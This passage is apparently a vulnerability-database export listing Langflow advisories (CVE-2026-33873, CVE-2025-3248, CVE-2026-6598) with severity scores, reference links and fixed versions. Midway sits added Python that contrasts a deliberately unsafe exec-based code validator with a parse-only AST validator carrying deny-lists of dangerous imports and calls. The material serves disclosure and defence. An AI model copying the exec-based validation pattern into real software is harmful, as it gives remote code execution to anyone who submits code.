scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31
4
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53
5
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47
6
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156
7
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300
8
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79
9
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38
10
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135
11
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163
12
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53
13
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272
14
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399
15
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443
16
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87
17
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc
18
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33873
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33873
19
reference_url https://github.com/advisories/GHSA-v8hw-mh8c-jxfc
reference_id GHSA-v8hw-mh8c-jxfc
reference_type
scores
url https://github.com/advisories/GHSA-v8hw-mh8c-jxfc
fixed_packages
0
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-33873, GHSA-v8hw-mh8c-jxfc, PYSEC-2026-82
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v5pc-pdm9-97g8
17
url VCID-wv26-29b9-vqgg
vulnerability_id VCID-wv26-29b9-vqgg
summary
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
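Both this entry and the Agentic Assistant entry above (VCID-v5pc-pdm9-97g8) describe "validation" that actually executes the submitted Python. The block below is an added example, not Langflow's code, contrasting the unsafe pattern (exec the module, instantiate the class) with a parse-only validator. In Python, decorator expressions, default argument values, class bodies and module-level statements all run when a definition is executed, so exec-based validation is code execution even if nothing is ever "called". The source samples, the `_marker` sink and the deny-lists are constructed for illustration.

```python
"""Added example, not Langflow's code: two ways of "validating" untrusted
Python source. validate_by_exec() mirrors the dangerous pattern the two
advisories describe (the module is executed and the class instantiated,
so decorators, default arguments, class bodies, module scope and __init__
all run server-side). validate_by_ast() parses only and reports the
places where execution would have happened. The source samples, the
_marker sink and the deny-lists are constructed for illustration.
"""
import ast

# Stand-in for the host: a real payload would hit the filesystem or a shell.
SIDE_EFFECTS: list[str] = []


def _marker(tag: str):
    """Records that `tag` executed; returns an identity decorator so it can
    also sit in a decorator or default-argument position."""
    SIDE_EFFECTS.append(tag)
    return lambda obj: obj


# Constructed untrusted source: five places that run at definition time.
UNTRUSTED_SOURCE = '''\
import os
_marker("module-scope")
class Component:
    _marker("class-body")
    def __init__(self):
        _marker("init")
    @_marker("decorator")
    def build(self, path=_marker("default-arg")):
        return os.getcwd()
'''

# Constructed benign component: only definitions and constants.
CLEAN_SOURCE = '''\
class Component:
    name = "hello"
    def build(self, text: str = "hi") -> str:
        return text.upper()
'''


def validate_by_exec(source: str) -> bool:
    """The unsafe pattern: run the module, then instantiate the class it
    defines. Every marker in UNTRUSTED_SOURCE fires before any result is
    returned, so "validation" is already arbitrary code execution."""
    namespace = {"_marker": _marker}
    exec(compile(source, "<untrusted>", "exec"), namespace)
    component_cls = next(v for v in namespace.values() if isinstance(v, type))
    component_cls()  # __init__ runs here
    return True


BANNED_IMPORTS = {"os", "subprocess", "sys", "ctypes", "socket", "importlib"}
BANNED_CALLS = {"exec", "eval", "compile", "__import__", "open"}


def validate_by_ast(source: str) -> list[str]:
    """Parse-only validation: nothing is executed. Returns a list of
    findings; an empty list means the source passed the policy."""
    findings: list[str] = []
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg} (line {exc.lineno})"]

    definition_nodes = (ast.Import, ast.ImportFrom, ast.ClassDef,
                        ast.FunctionDef, ast.AsyncFunctionDef)
    for stmt in tree.body:
        if not isinstance(stmt, definition_nodes):
            findings.append(f"line {stmt.lineno}: statement executes at module scope")

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in BANNED_IMPORTS:
                    findings.append(f"line {node.lineno}: import of {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in BANNED_IMPORTS:
                findings.append(f"line {node.lineno}: import from {node.module}")
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in BANNED_CALLS):
            findings.append(f"line {node.lineno}: call to {node.func.id}")
        elif isinstance(node, ast.ClassDef):
            for stmt in node.body:  # expressions in a class body run when the class is defined
                if isinstance(stmt, ast.Expr) and not isinstance(stmt.value, ast.Constant):
                    findings.append(f"line {stmt.lineno}: statement executes in class body")
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            for deco in node.decorator_list:  # decorator expressions run at definition
                if not isinstance(deco, (ast.Name, ast.Attribute)):
                    findings.append(f"line {deco.lineno}: decorator expression evaluated at definition time")
            for default in node.args.defaults + node.args.kw_defaults:  # so do defaults
                if default is not None and not isinstance(default, ast.Constant):
                    findings.append(f"line {default.lineno}: non-constant default evaluated at definition time")
    return findings


if __name__ == "__main__":
    print("ast findings:", validate_by_ast(UNTRUSTED_SOURCE))
    print("side effects after ast:", SIDE_EFFECTS)
    validate_by_exec(UNTRUSTED_SOURCE)
    print("side effects after exec:", SIDE_EFFECTS)
```

A deny-list on the AST is a policy check, not a sandbox: it will not stop every trick (attribute access to builtins, string-built imports), which is why the decisive property is that `validate_by_ast` never executes anything. If a deployment genuinely needs to run the code to validate it, that run belongs in an isolated worker, not in the API process.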
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-3248
reference_id
reference_type
scores
0
value 0.92665
scoring_system epss
scoring_elements 0.9976
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-3248
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0
3
reference_url https://github.com/langflow-ai/langflow/pull/6911
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://github.com/langflow-ai/langflow/pull/6911
4
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
5
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248
6
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
7
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
8
reference_url https://www.vulncheck.com/advisories/langflow-unauthenticated-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/
url https://www.vulncheck.com/advisories/langflow-unauthenticated-rce
9
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt
reference_id CVE-2025-3248
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt
10
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py
reference_id CVE-2025-3248
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
reference_id CVE-2025-3248
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
12
reference_url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
13
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
fixed_packages
0
url pkg:pypi/langflow@1.3.0
purl pkg:pypi/langflow@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-rrva-95s5-kbcf
12
vulnerability VCID-sbea-kkfu-akgb
13
vulnerability VCID-u8mw-7znw-rfab
14
vulnerability VCID-v5pc-pdm9-97g8
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0
aliases CVE-2025-3248, GHSA-rvqx-wpfh-mfx7, PYSEC-2025-36
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wv26-29b9-vqgg
18
url VCID-ypxh-x2hy-3uhb
vulnerability_id VCID-ypxh-x2hy-3uhb
summary
Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint
A security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected code is the create_project/encrypt_auth_settings functions in src/backend/base/Langflow/api/v1/projects.py (Project Creation Endpoint component). The auth_settings argument supplied at project creation is stored in cleartext in a file or on disk. The attack can be launched remotely. A public exploit is available. The vendor was contacted early about this disclosure but did not respond.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6598
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02941
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6598
1
reference_url https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6598
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6598
5
reference_url https://vuldb.com/submit/791921
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
